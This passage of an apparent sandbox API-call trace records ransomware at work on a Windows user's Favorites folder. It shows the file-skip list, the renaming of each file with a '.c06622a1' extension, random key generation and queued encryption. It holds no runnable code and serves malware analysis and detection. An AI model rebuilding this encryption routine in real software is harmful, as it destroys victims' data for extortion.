(HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.066] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0159.066] _wcsicmp (_Str1="IE site on Microsoft.com.url", _Str2="README.c06622a1.TXT") returned -9 [0159.066] wcsstr (_Str="IE site on Microsoft.com.url", _SubStr="README") returned 0x0 [0159.066] _wcsicmp (_Str1="autorun.inf", _Str2="IE site on Microsoft.com.url") returned -8 [0159.066] wcslen (_String="autorun.inf") returned 0xb [0159.067] _wcsicmp (_Str1="boot.ini", _Str2="IE site on Microsoft.com.url") returned -7 [0159.067] wcslen (_String="boot.ini") returned 0x8 [0159.067] _wcsicmp (_Str1="bootfont.bin", _Str2="IE site on Microsoft.com.url") returned -7 [0159.067] wcslen (_String="bootfont.bin") returned 0xc [0159.067] _wcsicmp (_Str1="bootsect.bak", _Str2="IE site on Microsoft.com.url") returned -7 [0159.067] wcslen (_String="bootsect.bak") returned 0xc [0159.067] _wcsicmp (_Str1="desktop.ini", _Str2="IE site on Microsoft.com.url") returned -5 [0159.067] wcslen (_String="desktop.ini") returned 0xb [0159.067] _wcsicmp (_Str1="iconcache.db", _Str2="IE site on Microsoft.com.url") returned -2 [0159.067] wcslen (_String="iconcache.db") returned 0xc [0159.067] _wcsicmp (_Str1="ntldr", _Str2="IE site on Microsoft.com.url") returned 5 [0159.067] wcslen (_String="ntldr") returned 0x5 [0159.067] _wcsicmp (_Str1="ntuser.dat", _Str2="IE site on Microsoft.com.url") returned 5 [0159.067] wcslen (_String="ntuser.dat") returned 0xa [0159.067] _wcsicmp (_Str1="ntuser.dat.log", _Str2="IE site on Microsoft.com.url") returned 5 [0159.067] wcslen (_String="ntuser.dat.log") returned 0xe [0159.067] _wcsicmp (_Str1="ntuser.ini", _Str2="IE site on Microsoft.com.url") returned 5 [0159.067] wcslen (_String="ntuser.ini") returned 0xa [0159.067] _wcsicmp (_Str1="thumbs.db", _Str2="IE site on Microsoft.com.url") returned 11 [0159.067] wcslen (_String="thumbs.db") returned 0x9 [0159.067] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.067] wcslen (_String="386") returned 0x3 [0159.067] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.067] wcslen (_String="adv") returned 0x3 [0159.067] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.067] wcslen (_String="ani") returned 0x3 [0159.067] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.067] wcslen (_String="bat") returned 0x3 [0159.067] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.067] wcslen (_String="bin") returned 0x3 [0159.068] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.068] wcslen (_String="cab") returned 0x3 [0159.068] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.068] wcslen (_String="cmd") returned 0x3 [0159.068] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.068] wcslen (_String="com") returned 0x3 [0159.068] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.068] wcslen (_String="cpl") returned 0x3 [0159.068] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.068] wcslen (_String="cur") returned 0x3 [0159.068] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.068] wcslen (_String="deskthemepack") returned 0xd [0159.068] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.068] wcslen (_String="diagcab") returned 0x7 [0159.068] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.068] wcslen (_String="diagcfg") returned 0x7 [0159.068] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.068] wcslen (_String="diagpkg") returned 0x7 [0159.068] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.068] wcslen (_String="dll") returned 0x3 [0159.068] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.069] wcslen (_String="drv") returned 0x3 [0159.069] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.069] wcslen (_String="exe") returned 0x3 [0159.069] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.069] wcslen (_String="hlp") returned 0x3 [0159.069] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.069] wcslen (_String="icl") returned 0x3 [0159.069] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.069] wcslen (_String="icns") returned 0x4 [0159.069] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.069] wcslen (_String="ico") returned 0x3 [0159.069] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.069] wcslen (_String="ics") returned 0x3 [0159.069] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.069] wcslen (_String="idx") returned 0x3 [0159.069] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.069] wcslen (_String="ldf") returned 0x3 [0159.069] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.069] wcslen (_String="lnk") returned 0x3 [0159.069] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.069] wcslen (_String="mod") returned 0x3 [0159.069] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.069] wcslen (_String="mpa") returned 0x3 [0159.069] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.069] wcslen (_String="msc") returned 0x3 [0159.069] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.069] wcslen (_String="msp") returned 0x3 [0159.069] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.069] wcslen (_String="msstyles") returned 0x8 [0159.069] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.069] wcslen (_String="msu") returned 0x3 [0159.069] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.070] wcslen (_String="nls") returned 0x3 [0159.070] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.070] wcslen (_String="nomedia") returned 0x7 [0159.070] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.070] wcslen (_String="ocx") returned 0x3 [0159.070] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.070] wcslen (_String="prf") returned 0x3 [0159.070] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.070] wcslen (_String="ps1") returned 0x3 [0159.070] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.070] wcslen (_String="rom") returned 0x3 [0159.070] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.070] wcslen (_String="rtp") returned 0x3 [0159.070] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.070] wcslen (_String="scr") returned 0x3 [0159.070] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.070] wcslen (_String="shs") returned 0x3 [0159.070] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.070] wcslen (_String="spl") returned 0x3 [0159.070] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.070] wcslen (_String="sys") returned 0x3 [0159.070] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.070] wcslen (_String="theme") returned 0x5 [0159.070] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.070] wcslen (_String="themepack") returned 0x9 [0159.071] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.071] wcslen (_String="wpx") returned 0x3 [0159.071] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.071] wcslen (_String="lock") returned 0x4 [0159.071] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.071] wcslen (_String="key") returned 0x3 [0159.071] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.071] wcslen (_String="hta") returned 0x3 [0159.071] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.071] wcslen (_String="msi") returned 0x3 [0159.071] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.071] wcslen (_String="pdb") returned 0x3 [0159.071] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.071] wcslen (_String="sqlite") returned 0x6 [0159.071] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.071] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.071] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.071] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0159.071] wcscpy (in: _Dest=0x32400de, _Source="IE site on Microsoft.com.url" | out: _Dest="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0159.071] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 1 [0159.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0159.086] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.086] CloseHandle (hObject=0x19c) returned 1 [0159.086] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.086] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" [0159.086] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 0x5b [0159.086] wcscpy (in: _Dest=0x325011e, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.086] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.c06622a1"), dwFlags=0x8) returned 1 [0159.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x19c [0159.093] CreateIoCompletionPort (FileHandle=0x19c, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.093] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5042f2a7 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66853b42 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x137b0943 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5926f26 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4da430b0 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a7fd188 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3ce11716 [0159.097] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xad7bd4b [0159.100] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x697b8220 [0159.100] RtlComputeCrc32 (PartialCrc=0x8220, Buffer=0x710094, Length=0x80) returned 0xad37aedd [0159.101] RtlComputeCrc32 (PartialCrc=0xaedd, Buffer=0x710094, Length=0x80) returned 0xf99d53ea [0159.101] RtlComputeCrc32 (PartialCrc=0x53ea, Buffer=0x710094, Length=0x80) returned 0x7bf5b9c6 [0159.101] RtlComputeCrc32 (PartialCrc=0xb9c6, Buffer=0x710094, Length=0x80) returned 0xa6fba79 [0159.101] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.101] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.101] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.101] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0159.101] _wcsicmp (_Str1="Microsoft At Home.url", _Str2="README.c06622a1.TXT") returned -5 [0159.101] wcsstr (_Str="Microsoft At Home.url", _SubStr="README") returned 0x0 [0159.101] _wcsicmp (_Str1="autorun.inf", _Str2="Microsoft At Home.url") returned -12 [0159.101] wcslen (_String="autorun.inf") returned 0xb [0159.101] _wcsicmp (_Str1="boot.ini", _Str2="Microsoft At Home.url") returned -11 [0159.101] wcslen (_String="boot.ini") returned 0x8 [0159.101] _wcsicmp (_Str1="bootfont.bin", _Str2="Microsoft At Home.url") returned -11 [0159.101] wcslen (_String="bootfont.bin") returned 0xc [0159.101] _wcsicmp (_Str1="bootsect.bak", _Str2="Microsoft At Home.url") returned -11 [0159.101] wcslen (_String="bootsect.bak") returned 0xc [0159.101] _wcsicmp (_Str1="desktop.ini", _Str2="Microsoft At Home.url") returned -9 [0159.101] wcslen (_String="desktop.ini") returned 0xb [0159.101] _wcsicmp (_Str1="iconcache.db", _Str2="Microsoft At Home.url") returned -4 [0159.101] wcslen (_String="iconcache.db") returned 0xc [0159.101] _wcsicmp (_Str1="ntldr", _Str2="Microsoft At Home.url") returned 1 [0159.101] wcslen (_String="ntldr") returned 0x5 [0159.101] _wcsicmp (_Str1="ntuser.dat", _Str2="Microsoft At Home.url") returned 1 [0159.101] wcslen (_String="ntuser.dat") returned 0xa [0159.101] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Microsoft At Home.url") returned 1 [0159.101] wcslen (_String="ntuser.dat.log") returned 0xe [0159.101] _wcsicmp (_Str1="ntuser.ini", _Str2="Microsoft At Home.url") returned 1 [0159.101] wcslen (_String="ntuser.ini") returned 0xa [0159.101] _wcsicmp (_Str1="thumbs.db", _Str2="Microsoft At Home.url") returned 7 [0159.102] wcslen (_String="thumbs.db") returned 0x9 [0159.102] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0159.102] wcslen (_String="386") returned 0x3 [0159.102] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0159.102] wcslen (_String="adv") returned 0x3 [0159.102] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0159.102] wcslen (_String="ani") returned 0x3 [0159.102] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0159.102] wcslen (_String="bat") returned 0x3 [0159.102] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0159.102] wcslen (_String="bin") returned 0x3 [0159.102] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0159.102] wcslen (_String="cab") returned 0x3 [0159.102] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0159.102] wcslen (_String="cmd") returned 0x3 [0159.102] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0159.102] wcslen (_String="com") returned 0x3 [0159.102] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0159.102] wcslen (_String="cpl") returned 0x3 [0159.102] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0159.102] wcslen (_String="cur") returned 0x3 [0159.102] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0159.102] wcslen (_String="deskthemepack") returned 0xd [0159.102] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0159.102] wcslen (_String="diagcab") returned 0x7 [0159.102] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0159.102] wcslen (_String="diagcfg") returned 0x7 [0159.102] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0159.102] wcslen (_String="diagpkg") returned 0x7 [0159.102] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0159.102] wcslen (_String="dll") returned 0x3 [0159.102] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0159.103] wcslen (_String="drv") returned 0x3 [0159.103] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0159.103] wcslen (_String="exe") returned 0x3 [0159.103] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0159.103] wcslen (_String="hlp") returned 0x3 [0159.103] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0159.103] wcslen (_String="icl") returned 0x3 [0159.103] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0159.103] wcslen (_String="icns") returned 0x4 [0159.103] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0159.103] wcslen (_String="ico") returned 0x3 [0159.103] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0159.103] wcslen (_String="ics") returned 0x3 [0159.103] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0159.103] wcslen (_String="idx") returned 0x3 [0159.103] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0159.103] wcslen (_String="ldf") returned 0x3 [0159.103] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0159.103] wcslen (_String="lnk") returned 0x3 [0159.103] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0159.103] wcslen (_String="mod") returned 0x3 [0159.103] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0159.103] wcslen (_String="mpa") returned 0x3 [0159.103] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0159.103] wcslen (_String="msc") returned 0x3 [0159.103] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0159.103] wcslen (_String="msp") returned 0x3 [0159.103] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0159.103] wcslen (_String="msstyles") returned 0x8 [0159.103] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0159.103] wcslen (_String="msu") returned 0x3 [0159.103] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0159.103] wcslen (_String="nls") returned 0x3 [0159.103] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0159.103] wcslen (_String="nomedia") returned 0x7 [0159.104] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0159.104] wcslen (_String="ocx") returned 0x3 [0159.104] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0159.104] wcslen (_String="prf") returned 0x3 [0159.104] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0159.104] wcslen (_String="ps1") returned 0x3 [0159.104] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0159.104] wcslen (_String="rom") returned 0x3 [0159.104] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0159.104] wcslen (_String="rtp") returned 0x3 [0159.104] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0159.104] wcslen (_String="scr") returned 0x3 [0159.104] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0159.104] wcslen (_String="shs") returned 0x3 [0159.104] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0159.104] wcslen (_String="spl") returned 0x3 [0159.104] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0159.104] wcslen (_String="sys") returned 0x3 [0159.104] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0159.104] wcslen (_String="theme") returned 0x5 [0159.104] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0159.104] wcslen (_String="themepack") returned 0x9 [0159.104] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0159.104] wcslen (_String="wpx") returned 0x3 [0159.104] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0159.104] wcslen (_String="lock") returned 0x4 [0159.104] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0159.104] wcslen (_String="key") returned 0x3 [0159.104] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0159.104] wcslen (_String="hta") returned 0x3 [0159.105] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0159.105] wcslen (_String="msi") returned 0x3 [0159.105] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0159.105] wcslen (_String="pdb") returned 0x3 [0159.105] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0159.105] wcslen (_String="sqlite") returned 0x6 [0159.105] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites")) returned 0x10 [0159.105] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.105] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites" [0159.105] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 0x3e [0159.105] wcscpy (in: _Dest=0x32400de, _Source="Microsoft At Home.url" | out: _Dest="Microsoft At Home.url") returned="Microsoft At Home.url" [0159.105] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 1 [0159.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0159.105] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0159.105] CloseHandle (hObject=0x194) returned 1 [0159.105] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.105] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" [0159.106] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 0x54 [0159.106] wcscpy (in: _Dest=0x3250110, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.106] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.c06622a1"), dwFlags=0x8) returned 1 [0159.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0159.108] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.108] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x63c17f1 [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57184564 [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x495974cb [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x209a03dc [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2159590b [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a62b453 [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2e36a872 [0159.115] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x39fd0d79 [0159.118] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0x27053cfe [0159.118] RtlComputeCrc32 (PartialCrc=0x3cfe, Buffer=0x2690094, Length=0x80) returned 0x484836a3 [0159.118] RtlComputeCrc32 (PartialCrc=0x36a3, Buffer=0x2690094, Length=0x80) returned 0xb841ecee [0159.118] RtlComputeCrc32 (PartialCrc=0xecee, Buffer=0x2690094, Length=0x80) returned 0xdb7d5b3e [0159.118] RtlComputeCrc32 (PartialCrc=0x5b3e, Buffer=0x2690094, Length=0x80) returned 0xf0c02404 [0159.118] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0159.118] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.118] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.118] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0159.118] _wcsicmp (_Str1="Microsoft At Work.url", _Str2="README.c06622a1.TXT") returned -5 [0159.118] wcsstr (_Str="Microsoft At Work.url", _SubStr="README") returned 